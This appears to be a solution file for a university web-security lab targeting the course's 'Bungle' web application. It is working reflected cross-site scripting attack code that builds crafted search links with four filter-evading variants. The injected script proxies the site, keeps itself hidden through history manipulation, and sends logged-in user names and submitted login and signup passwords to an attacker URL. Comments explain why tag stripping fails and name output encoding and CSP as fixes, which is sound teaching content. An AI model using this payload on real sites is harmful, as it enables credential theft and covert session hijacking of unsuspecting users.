- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- // payload(attacker): the script that makeLink() embeds in the crafted search
- // URL; `attacker` is the URL that log() sends captured data to with $.get.
- // NOTE: makeLink() serialises this function with payload.toString(), so
- // everything from `function` to the closing brace, comments included, is
- // part of the emitted link. The body below is left byte-for-byte unchanged.
- //
- // What it does once it runs in the target page:
- //  - hides <html>, then proxy("/", true) loads the home page into it;
- //  - proxy() sets the address bar to `href` with pushState/replaceState and
- //    calls itself again on popstate, which appears intended to keep the URL
- //    and back button looking normal while this script stays resident;
- //  - after each load it rebinds the log-in, log-out, new-account and search
- //    controls: form values are sent to the site with $.post and, in the
- //    success callback, also passed to log() (user name and password for
- //    login and create);
- //  - hides links whose text contains "<scrip", "<bod" or "<iframe",
- //    presumably search-history entries that would show the injected query.
- //
- // Defender notes: the entry point is the reflected `q` search parameter (see
- // makeLink). Useful signals are a `q` value that carries markup, and
- // cross-origin GETs from the page with `event`, `user` and `pass` query
- // fields. Encoding `q` for the HTML context on output closes the hole; a
- // Content-Security-Policy that forbids inline script and restricts
- // connect-src would also stop the script and the $.get beacon.
- function payload(attacker) {
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href, popped) {
- var stateObj = { attack: href };
- if (popped) {
- history.pushState(stateObj, "", href);
- } else {
- history.replaceState(stateObj, "", href);
- }
- window.onpopstate = function (e) {
- var json = e.state;
- proxy(json['attack'], false);
- };
- $("html").load(href, function(){
- $("html").show();
- // Log nav
- if ($('#logged-in-user').length) {
- var logged_in_user = $('#logged-in-user').html().toString();
- log({event: "nav", user: logged_in_user, url: href})
- } else {
- log({event: "nav", url: href})
- }
- // Log logout
- $("#log-out-btn").click(function(e) {
- e.preventDefault();
- var logged_in_user = $('#logged-in-user').html().toString();
- $.post("http://cos432-assn3.cs.princeton.edu/logout",
- {},
- function() {
- log({event: "logout", user: logged_in_user});
- proxy("/", true);
- }
- );
- });
- // Log login
- $("#log-in-btn").click(function(e) {
- e.preventDefault();
- var user = $('#username').val();
- var pass = $('#userpass').val();
- $.post("http://cos432-assn3.cs.princeton.edu/login",
- {
- username: user,
- password: pass
- },
- function() {
- log({event: "login", user: user, pass: pass});
- proxy("/", true);
- }
- );
- });
- // Log create account
- $("#new-account-btn").click(function(e) {
- e.preventDefault();
- var user = $('#username').val();
- var pass = $('#userpass').val();
- $.post("http://cos432-assn3.cs.princeton.edu/create",
- {
- username: user,
- password: pass
- },
- function() {
- log({event: "create", user: user, pass: pass});
- proxy("/", true);
- }
- );
- });
- // Navigate to search
- $("#search-btn").click(function(e) {
- e.preventDefault();
- proxy("/search?q=" + encodeURIComponent($("#query").val()));
- });
- // Navigate to search again
- $("#search-again-btn").click(function(e) {
- e.preventDefault();
- proxy("/", true);
- });
- // Home page
- $("#bungle-lnk").click(function(e) {
- e.preventDefault();
- proxy("/", true);
- });
- // Hide attacks in search
- $("a:contains(\"<scrip\")").hide();
- $("a:contains(\"<bod\")").hide();
- $("a:contains(\"<iframe\")").hide();
- });
- }
- $("html").hide();
- proxy("/", true);
- }
- // makeLink(xssdefense, target, attacker): returns target + "/search" with the
- // given xssdefense value and a URI-encoded `q` that carries the source text
- // of payload() followed by a call payload("<attacker>").
- // Returns undefined for any xssdefense other than 0-3 (there is no final
- // else). `==` is used, so the string "2" selects the same branch as the
- // number 2. `attacker` is placed inside a double-quoted JS string unescaped.
- // The xssdefense value is forwarded to the target in the query string;
- // presumably it selects which server-side filter is applied - TODO confirm.
- // The "<script" + ">" style splits presumably keep the literal tags from
- // being parsed as markup of the page hosting this script - TODO confirm.
- // NOTE(review): read as a defender, the four branches show why removing tags
- // from input is not a defence; `q` has to be encoded for the HTML context
- // when it is written into the results page.
- function makeLink(xssdefense, target, attacker) {
- // Mode 0: payload wrapped in a plain script element; this only works when
- // `q` is reflected with no filtering or encoding at all.
- if (xssdefense == 0) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</script" + ">");
- }
- // Mode 1: "scrscriptipt" collapses to "script" when the inner "script" is
- // deleted once, so a single-pass removal rebuilds the tag it was meant to
- // strip.
- else if (xssdefense == 1) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<scrscriptipt" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</scrscriptipt" + ">");
- }
- // Mode 2: no script element; the code sits in a body onload attribute, so
- // a filter that only looks for script tags does not see it.
- else if (xssdefense == 2) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<body onload='" + payload.toString() +
- ";payload(\"" + attacker + "\")'" + ">" + "</body" + ">");
- }
- // Mode 3: same approach as mode 2, using an iframe onload attribute.
- else if (xssdefense == 3) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<iframe onload='" + payload.toString() +
- ";payload(\"" + attacker + "\")'" + ">" + "</iframe" + ">");
- }
- }
- // Lab configuration: pick the filter mode and build the link the user is
- // meant to click. xssdefense = 2 selects the body-onload branch of
- // makeLink(). target is the assignment's web application. attacker is a
- // loopback address, so log() requests go to port 31337 on whichever machine
- // runs the browser that executes the payload.
- var xssdefense = 2;
- var target = "http://cos432-assn3.cs.princeton.edu";
- var attacker = "http://127.0.0.1:31337/stolen";
- // On DOM ready, build the link and write it into the page's <h3> as an
- // anchor that opens in the window named "run". The anchor markup is built by
- // string concatenation and set with .html(); the q part of url was already
- // URI-encoded inside makeLink().
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3></h3>